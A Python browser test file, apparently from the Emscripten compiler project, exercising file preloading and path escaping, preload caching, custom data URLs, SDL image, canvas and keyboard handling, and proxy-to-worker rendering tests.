def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''');
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
filePackagePrefixURL: "''' + assetLocalization + r'''",
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>'''
)
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data','missing.data');
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for filePackagePrefixURL
#open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http:/localhost:8888/cdn/", '))
#test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
def test_glgears_proxy(self):
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
original = open('test.js').read()
def copy(to, js_mod, html_mod = lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut']).communicate()
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//Module.print('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//Module.print('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
